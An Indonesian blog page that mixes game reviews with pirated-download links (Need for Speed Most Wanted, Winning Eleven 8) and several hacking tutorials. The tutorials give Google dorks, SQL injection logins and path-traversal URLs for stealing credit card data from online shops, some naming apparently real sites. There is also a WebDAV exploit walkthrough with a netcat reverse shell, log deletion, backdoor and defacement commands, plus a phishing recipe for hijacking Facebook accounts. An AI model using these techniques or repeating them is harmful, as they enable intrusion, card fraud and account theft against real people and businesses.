need for speed most wanted indowebster download

7:06 AM | , ,


NFS Most Wanted adalah game race dengan super car. Pada game ini NFS Most Wanted diartikan sebagai seorang pengemudi yang suka ngebut dan paling dikejar oleh polisi lalu lintas.. Kata Most Wanted adalah seseorang yang sangat dicari karena sulit ditangkap dan menghilang ketika dikejar

Gameplay
Cerita game ini memiliki karir mode selain free style dalam mengendarai kendaraan. Untuk karier game, pemain harus menabung dan mencari uang untuk mendapatkan kendaraan baru. Kesulitan game NFS Most Wanted dimulai ketika anda harus mendapatkan posisi dari 15 besar pengemudi yang paling dimusuhi dan dicari polisi. Anda harus mengalahkan satu demi satu sambil mengumpulkan uang untuk mendapatkan model kendaraan baru. Disini kesulitan game NFS Most Wanted, walaupun memiliki uang cukup tetapi kendaraan baru yang lebih cepat tetap sulit. Memiliki kendaraan baru hanya akan didapat bila anda mengalahkan dari daftar pesaing secara satu persatu.

Sialnya, lawan dengan kendaraan yang telah di upgrade juga dilengkapi dengan power nitrogen (NOS). Disini sisi kesulitan melawan kendaraan lawan, selain kendaraan mereka lebih cepat dari mobil anda. Beruntung pada jalur track balapan masih tersedia jalur memotong untuk menyusul lawan. Dan anda harus jeli kapan mengunakan jalur tersebut kecuali mobil anda juga sudah dilengkapi sistem power NOS.

Semakin tinggi anda mengalahkan si 15 besar nantinya akan muncul kendaraan super cepat. Bila pada awal permainan anda mengunakan BMW M3 dengan top speed sekitar 250KM diluar NOS. Pada super car kecepatan kendaraan anda akan mudah dipacu melebihi 300KM perjam. Bila memiliki kendaraan ini akan lebih mudah mengalahkan lawan anda tentunya. Sayangnya, ketika memulai karir anda sebagai pembalap, kendaraan anda hanya berkecepatan dibawah 150KM perjam.

Game ini paling menarik ketika memainkan game mode hot pursuit. Tidak hanya 2 atau 3 kendaraan polisi saja mengejar anda tetapi berusaha menghadang didepan jalan. Bila anda lolos dari kejaran maka terdapat nilai bonus dan nilai menyelesaikan misi lainnya. Jangan mengangap kendaraan polisi yang mengejar tidak cepat, karena kecepatan mereka juga melewati 200KM perjam. Bila mobil anda belum memiliki top speed diatas 200KM, ada baiknya mencari jalan kecil untuk menghindar secepatnya atau mencari trik bagaimana menghilang lebih cepat agar tidak terlihat oleh pengejar.

NFS Most Wanted menampilkan efek ketika kecepatan diatas 200KM. Seperti berkendaraan dijalan umum lainnya, maka kecepatan gambar untuk sisi jalan akan terlihat blur. Artinya anda memang sedang berkendaraan diatas kecepatan rata rata mobil lain. Pada kecepatan 200KM lebih maka tampilan game ini terlihat sangat menarik, disamping anda harus menyalip dengan cepat diantara kendaraan didepan anda.

Special efek
NFS Most Wanted menambahkan efek gambar ketika kendaraan anda harus melompat dari jalan. Efek ini muncul ketika kendaraan anda terlalu cepat pada jalan yang menurun. Dan akan ditampilkan gambar ketika kendaraan melombat terbang karena terlalu cepat. Gambar efek ini akan di freeze sesaat sebelum kembali pada display seperti semula.

Ketika bermain NFS Most Wanted sempatkan anda menekan tombol G atau CTRL kanan. Fitur ini sangat diperlukan bila anda dalam posisi terjepit. Misalnya kendaraan anda sedang dipacu dengan kecepatan tinggi, secara tiba tiba anda harus menyalip mobil lain dan harus melewati celah yang sangat sempit. Pada kecepatan tinggi tentu tabrakan tidak akan terhindari. Dengan tombol G atau CTRL kanan anda diberikan kesempatan untuk memperlambat gambar dyang diperlambat. Ketika gambar memperlambat, anda dapat memperbaiki posisi kendaraan anda agar dapat lolos dari tabrakan fatal. Atau anda dapat menikmati beberapa saat aksi anda dalam slow motion. Aksi dengan tombol G atau CTRL kanan menjadi tombol khusus untuk dinikmati, khususnya bila kendaraan anda memang ingin bisa lolos untuk menerobos diantara 2 kendaraan didepan anda tanpa mengurangi kecepatan laju kendaraan.

Kesimpulan
NFS Most Wanted telah mendapat rate tinggi dari para review game. Fitur aksi game NFS Most Wanted lebih mengarahkan pemain untuk menikmati tampilan gambar ketika berkendara dengan super car dengan beberapa kejutan. Tampilan gambar dari NFS Most Wanted dengan DirectX 9.0 menyajikan gambar lebih menarik diserta detail jalan , gedung serta pohon disekitar jalan membuat game ini terlihat realistik. Jalan untuk berkendaraan dibuat bervariasi antara highway sampai berkendaran didalam jalan kota.Sambil bermain game ini, sekiranya ada gambaran seperti apa yah mengendari kendaraan super dijalan Amerika. Skenario mengalahkan 15 daftar blacklist cukup berat untuk dilewati, tetapi akan terbayar dengan tambahan kendaraan baru yang lebih cepat untuk anda.

NFS Most Wanted dengan teknologi DirectX 9.0 membutuhkan perangkat hardware high-end. Untuk menikmati game NFS Most Wanted terbaik dengan tingkat resolusi 1280x1024. Gambar detail lebih terlihat jelas dan memudahkan anda berkendara dengan super car secara nyaman. Tetapi pada tingkat resolusi tersebut dibutuhkan VGA high-end. Pada test dengan GeForce 7800GT, tingkat FPS dapat mencapai tingkat ideal diatas 60 FPS. Sayangnya dengan ATI X800 game NFS Most Wanted hanya mampu menampilkan kecepatan yang dibawah 60FPS. Kecepatan frame gambar NFS Most Wanted sangat menentukan kemahiran dalam memainkan game ini.

Untuk saran memainkan NFS Most Wanted, sebaiknya mempersiapkan perangkat hardware high end. Menurunkan kualitas gambar pada option game dapat meningkatkan frame rate game ini. Tetapi kualitas gambar dipastikan akan berbeda, dan anda tidak akan menikmati game ini secara baik.

Minimum System Requirements

OS: Windows XP or 2000
CPU: 1.4 GHz or faster
RAM: 256 MB or more
Disc Drive: 8x or faster CD/DVD drive
Hard Drive: 3 GB or more free space
Video: DirectX 9.0c compatible (see right)
Sound: DirectX 9.0c compatible
Input: Keyboard, mouse, or USB Steering Wheel/Gamepad
Video card with 32 MB or more memory and one of these chipsets is required: ATI Radeon 7500 or greater; ATI Radeon Xpress 200; NVIDIA GeForce2 MX/GTS or greater; Intel 950/i915g; S3 GammaChrome S18 Pro

jika ingin mendownload klik icon dibawah ini

Read More

warriors orochi

5:51 AM | ,


Nah ini ada satu lagi game yang dipublish oleh Koei keluaran Omega Force, yaitu developer seri Dynasty Warrior. Game ini pertama kali dirilis untuk versi PS2 pada akhir tahun 2007, dan pada akhir Maret kemarin baru dirilis untuk versi PSP dan juga versi PC nya.

Nah apakah Warriors Orochi ini sama dengan Warriors game sebelumnya..Ya dari segi gameplay dan ide permainan sama dengan Dynasty Warriors yaitu game action dengan gaya permainan hack and slash dan kali ini pada dasarnya setting cerita diambil dari gabungan Dynasty Warriors dan Samurai Warriors, sehingga memiliki jumlah karakter yang banyak untuk melawan raja iblis Orochi dan pengikut-pengikutnya.

Sama seperti sebelumnya dalam setiap misinya anda diharuskan untuk membantai ratusan pasukan musuh dengan teknik-teknik pukulan, dan diselesaikan dengan pukulan kombo pukulan,, nah juga ada Musou, teknik untuk menghajar musuh dalam jumlah yang besar, namun perlu waktu untuk mengisi bar musou kembali untuk dapat digunakan. Nah dalam game ini, anda dapat mengontrol tiga orang karakter yang dapat diganti kapan saja dalam permainan.

Dari segi gameplay Warrior Orochi ini cukup bagus dan menarik.Untuk overall gameplay Warrior Orochi ini masih sangat fun untuk dimainkan, dengan karakter yang banyak jumlahnya, dan juga untuk mencoba-coba untuk upgrade dari elemen-elemen senjatanya. SO jangan lupa untuk mencoba game ini.

minimum requirement :
Operating System : Windows XP and Windows Vista (incompatible with 64-bit editions)
CPU : Pentium 4 1.6GHz
RAM : 256MB
Hard Disk: 6GB or more of free space
Display: 640×480 True Color enabled
Video Card :3D Accelerator with Hardware T&L and Pixel Shading supporting 64MB or more of VRAM, DirectX 9.0c+
Sound Card DirectX 9.0c+ compliant, 16-bit stereo with 44KHz playback supported by Windows XP/Vista
Controller: Keyboard

Read More

hacking admin website

5:26 AM |

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1
2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi?page=short_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log
3. contoh bugs pada bentuk toko sistem : metacart
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com allinurl:/metacart/
Contoh target : www.xxxxxx.com/metacart/about.asp
Hapus moreinfo.asp dan ganti dengan --> /database/metacart.mdb
Hasilnya : /www.xxxxxx.com/metacart/database/metacart.mdb
--------------------------

advertising
---------------------------
4. contoh bugs pada bentuk toko sistem :DCShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/DCShop/
Contoh : www.xxxxxx.com/xxxx/DCShop/xxxx
Hapus /DCShop/xxxx dan ganti dengan --> /DCShop/orders/orders.txt
atau /DCShop/Orders/orders.txt
Hasilnya : www.xxxx.com/xxxx/DCShop/orders/orders.txt
5. contoh bugs pada bentuk toko sistem : PDshopro
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/shop/category.asp/catid=
Contoh : www.xxxxx.com/shop/category.asp/catid=xxxxxx
Hapus /shop/category.asp/catid=xxxxx dang ganti dengan --> /admin/
dbsetup.asp
Hasilnya : www.xxxxxx.com/admin/dbsetup.asp
Dari keterangan diatas , kita dapati file databasenya dgn nama
sdatapdshoppro.mdb
Download file sdatapdshoppro.mdb dengan merubah url nya menjadi
www.xxxxxx.com/data/pdshoppro.mdb
Buka file tsb pakai Microsoft Acces (karena untuk membaca database
access.mdb sebaiknya pake ms access aja)
6. contoh bugs pada bentuk toko sistem : commerceSQL
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl:/commercesql/
Contoh : www.xxxxx.com/commercesql/xxxxx
Hapus commercesql/xxxxx dan ganti dengan -->
cgi-bin/commercesql/index.cgi?page=
Hasilnya : www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=
Untuk melihat admin config -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
Untuk melihat admin manager -->
www.xxxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
Untuk melihat file log/CCnya -->
www.xxxxx.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order...
7. contoh bugs pada bentuk toko sistem : EShop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google: Ketik --> allinurl:/eshop/
Contoh : www.xxxxx.com/xxxxx/eshop
Hapus /eshop dan ganti dengan --> /cg-bin/eshop/database/order.mdb
Hasilnya : www.xxxxxx.com/.../cg-bin/eshop/database/order.mdb
Download file *.mdb nya dan Buka file tsb pakai Microsoft Acces
(karena untuk membaca database access.mdb sebaiknya pake ms access
aja)
8. contoh bugs pada bentuk toko sistem : Cart32 v3.5a
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com: Ketik --> allinurl:/cart32.exe/
Contoh : www.xxxxxx.net/wrburns_s/cgi-bin/cart32.exe/NoItemFound
Ganti NoItemFound dengan --> error
Bila kita mendapati page error dg keterangan instalasi dibawahnya,
berarti kita sukses!
Sekarang, kita menuju pada keterangan di bawahnya, geser halaman
kebawah, dan cari bagian Page Setup and Directory
Kalau dibagian tersebut terdapat list file dgn format/akhiran .c32
berarti di site tsb. terdapat file berisi data cc
Copy salah satu file .c32 yg ada atau semuanya ke notepad atau program
text editor lainnya.
Ganti string url tsb. menjadi seperti ini : http://www.xxxxxx.net/wrburns_s/cgi-bin/cart32/
Nah.., paste satu per satu, file .c32 ke akhir url yg sudah
dimodifikasi tadi, dengan format
http://www.xxxxx.com/cart32/
Contoh http://www.xxxxxxx.net/wrburns_s/cgi-bin/cart32/WRBURNS-001065.c32
9. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
teknik/jalan ke dua
google.com Ketik --> allinurl:/vpasp/shopdisplayproducts.asp
Buka url target dan tambahkan string berikut di akhir bagian
shopdisplayproducts.asp
Contoh :
http://xxxxxxx.com/vpasp/shopdisplayproducts.asp?cat=qwerty'%20union%...,
fldpassword%20from%20tbluser%20where%20fldusername=
'admin'%20and%20fldpassword%20like%20'a%25'--
Gantilah nilai dari string url terakhir dg:
%20'a%25'--
%20'b%25'--
%20'c%25'--
Kalau berhasil, kita akan mendapatkan informasi username dan password
admin
Untuk login admin ke http://xxxx.com/vpasp/shopadmin.asp
silahkan Cari sendiri data CCnya
10. contoh bugs pada bentuk toko sistem : VP-ASP Shopping Cart 5.0
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/vpasp/shopsearch.asp
Buka url target dan utk membuat admin baru, postingkan data berikut
satu per satu pada bagian search engine :
Keyword=&category=5); insert into tbluser (fldusername) values
('')--&SubCategory=&hide=&action.x=46&action.y=6
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Keyword=&category=3); update tbluser set fldaccess='1' where
fldusername=''--&SubCategory=All&action.x=33&action.y=6
Jangan lupa untuk mengganti dan nya terserah kamu.
Untuk mengganti password admin, masukkan keyword berikut :
Keyword=&category=5); update tbluser set fldpassword='' where
fldusername='admin'--&SubCategory=All&action.x=33&action.y=6
Untuk login admin, ada di http://xxxxxxx/vpasp/shopadmin.asp
11. contoh bugs pada bentuk toko sistem : Lobby.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com Ketik --> allinurl: Lobby.asp
Contoh : www.xxxxx.com/mall/lobby.asp
Hapus tulisan mall/lobby.asp dan ganti dengan --> fpdb/shop.mdb
Hasilnya : www.xxxxx.com/fpdb/shop.mdb
12. contoh bugs pada bentuk toko sistem : Shopper.cgi
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google : Ketik --> allinurl: /cgi-local/shopper.cgi
Contoh : www.xxxxxx.com/cgi-local/shopper.cgi/?preadd=action&key=
Tambah dengan --> ...&template=order.log
Hasilnya : www.xxxxxxxx.com/cgi-local/shopper.cgi?preadd=action&key=...&template...
13. contoh bugs pada bentuk toko sistem :Proddetail.asp
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik --> allinurl:proddetail.asp?prod=
Contoh : www.xxxxx.org/proddetail.asp?prod=ACSASledRaffle
Hapus tulisan proddtail.asp?prod=SG369 dan ganti dengan --> fpdb/
vsproducts.mdb
Hasilnya : www.xxxxxx.org/fpdb/vsproducts.mdb
14. contoh bugs pada bentuk toko sistem :Digishop
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google Ketik --> inurl:"/cart.php?m="
Contoh : http://xxxxxxx.com/store/cart.php?m=view.
Hapus tulisan cart.php?m=view dan ganti dengan -->admin
Hasilnya http://xxxxxx.com/store/admin
Trus masukin username sama pass nya pake statment SQL injection
Usename : 'or"="
Password : 'or"="

Admin tidak bertanggung jawab dalam penggunaan artikel ini

Read More

Winning Eleven 8 Full Version and update 2010-2011 indowebster download

5:05 AM | , ,


Winning Eleven (sering disingkat WE, baca: wé-é) adalah nama video game sepak bola populer yang dikembangkan oleh Konami Computer Entertainment Tokyo. Game ini tersedia dalam beberapa platform:Ps 2,Xbox,Psp dan Pc.
Ironisnya di Indonesia,Video game ini populer justru bukan-lah versi asli yang dikeluarkan oleh konami seperti yang tercantum di bawah, melainkan versi yang telah dimodifikasi patch-nya oleh beberapa cracker indonesia, sehingga muncullah versi-versi WE yang "merakyat" seperti Liga Bank Mandiri,Tiger Cup,Liga Champion,Piala Dunia, terakhir WE 10^16, adapun WE 234^3 dan sebagainya yang dikenal oleh berbagai lapisan masyarakat Indonesia yang menggemari sepak bola.
Adapun nama-nama samaran yang berhasil di dapatkan dari semua isi game WE yang beredar di Indonesia sebagai berikut:
  1. WO's
  2. Central Star Mangga Dua
  3. OREN's games
  4. Voltus game
  5. Cijerah
  6. Kopo
  7. Game Shop
  8. OXA Games
  9. Pagarsih
  10. Mutiara
  11. Crash SMD Cimalaka
  12. Febry Game
Kemungkinan nama-nama samaran pembuat WE Indonesia hanya beberapa orang saja.
Winning Eleven dirilis sebagai Pro Evolution Soccer di Eropa, Australia dan Amerika Utara.
Mulai Winning Eleven 11, seri Winning Eleven diperkirakan akan hadir dalam sistem Play Station 3
minimum requirement
Windows 98SE/ME/2000/XP
MINIMUM
Pentium III 800MHz Processor
128MB RAM
4X DVD-ROM Drive
nVidia GeForce 3 or ATi Radeon 8500 Class Video Card
DirectX compatible Sound Card
DirectX 8.1
800MB Hard Disk Space
RECOMMENDED
Pentium 4 1.4GHz Processor
256MB RAM
8X DVD-ROM Drive
nVidia GeForce 4 Ti or ATi Radeon 9600 Class Video Card
DirectX compatible Sound Card
DirectX 8.1
3GB Hard Disk Space
untuk mendownload Winning Eleven 8 Full Version klik ikon di bawah ini

if link above not work click here 
(include update ISL and IPL team 2012, all update new player 2012, kit server, KDF mod for pc and Xbox)

update 2010-2011


*KDF mod

 *KDF mod












*ISL and IPL team

Cara :
1 Kamu cari dulu folder konami yang ada we8 nya.
2 cari folder save
3 hapus yang ada di folder1 (didalam folder save)
4 drag file yang ada di Rar tersebut ke folder1
5 buka we8nya terus hapus semua file termasuk option file, cup league, dan ML.
6 setelah itu keluar dare we8 dan buka kembali we8nya,, lihat apa yang terjadi !!

(kalau instalnya kamu simpan di C biasanya gak ada savenya. kamu instal ulang dan disimpan di D )
Read More

Hacking Dengan IIS

2:09 PM |


1) Pendahuluan

Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan

Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.

Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.

Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa

Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.

Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.

Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ….

Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.

D:\vcproject\webdave\debug>web.exe

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]

www.coromputer.net && undernet #coromputer

syntax: D:\WEB.EXE [padding]

Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:

D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666

Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ….

connect to 200.200.200.200 from 123.123.123.123

Microsoft(R) Windows 2000

(C)Copyright Microsoft Corp 1981-2000.

C:\winnt\system32>

Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.

C:\winnt\system32> rmdir /s /q logfiles

Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.

Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.

Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.

Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:

C:\inetpub\wwwroot> copy index.html indexold.html

C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html

Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:

C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html

Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:

C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100

Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

5) Kesimpulan

Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.

Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Read More

Hacking Facebook Dengan Forgot Password

2:05 PM |

Banyak cara untuk mencuri username/email dan password untuk login account facebook. Diantaranya dengan cara berikut ;

  1. Buat email palsu dengan domain yang meyakinkan dan bukan gratisan seperti yahoomail dan googlemail. (Contoh nyata ; ****@backd00red.org)
  2. Cari email target, kita dapat mencari daftar email melaui banyak cara, dan yang paling amatir adalah lewat google atau untuk percobaan, pakai saja email teman kamu.
  3. Setelah mendapatkan email yang terdaftar di facebook, buka halaman login facebook.
  4. Pilih link forget password, reset password, atau change email address, atau yang sejenis.
  5. Kirimkan pada email target. Usahakan email tersebut mirip dan disertai dengan signature / tertanda team facebook. Contohnya :


    Screenshot email di atas adalah contoh nyata yang pernah berhasil menipu seseorang pemilik alamat blog wilson-the prayer. Silahkan baca pengalaman pak wilson dengan facebook nya tersebut.

  6. Lanjut, Email di atas menawarkan konfirmasi asosiasi (hubungan) account dengan email yang kita miliki. Jika target menerima dan mengikuti link yang kita berikan di atas. Maka password lama atau baru akan dikirim ke email kita, bukan lagi pada email si pemilik asli alias target.
  7. Done. Kita mendapatkan passwordnya.
Read More

Carding Tutorial Archive

1:51 PM |


Hallo teman semua, tidakkah anda tahu seberapa mudahkah anda melakukan hal ini.
Ini hanya informasi, namun kita perlu untuk mengetahuinya.
Beberapa yang biasa dilakukan didunia carding ini.

Lets Begin – Just For Share!

CGI Store Log

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm

2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=

3. Masukkan file ini di belakang situs tadi :

../admin/files/order.log

Misal nya http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

4. Maka yang keluar di situs itu adalah nomor CC (credit card).

Admin Take Over

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.partsupply.in.th/shopadmin.asp

2. Langkah selanjutnya gunakan teknik SQL Injection

user : ‘or”=’
pass : ‘or”=’

3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.

Database Downloadable

Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :

1. http://www.youngsliquors.com/winestore/shopadmin.asp

2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/

3. Masukkan file ini di belakang situs tadi :

shopdbtest.asp

Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp

4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
contoh :

